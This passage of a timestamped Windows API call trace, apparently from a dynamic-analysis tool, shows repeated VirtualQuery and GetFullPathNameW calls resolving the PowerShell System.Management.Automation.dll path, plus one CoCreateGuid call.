VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.245] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.248] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.249] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.250] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.253] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.254] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.254] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.255] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.256] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.257] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.257] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.258] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.260] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.261] VirtualQuery (in: lpAddress=0x16bba0, lpBuffer=0x16ca60, dwLength=0x30 | out: lpBuffer=0x16ca60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.262] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.264] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.270] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.271] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.272] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5a40524e, Data2=0x9756, Data3=0x426e, Data4=([0]=0xab, [1]=0xef, [2]=0xe6, [3]=0x4b, [4]=0x15, [5]=0x52, [6]=0xa0, [7]=0x28))) returned 0x0 [0091.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.280] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.281] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.282] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.283] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.284] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.286] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.286] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.286] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.287] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.287] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.288] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.289] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.289] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.290] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 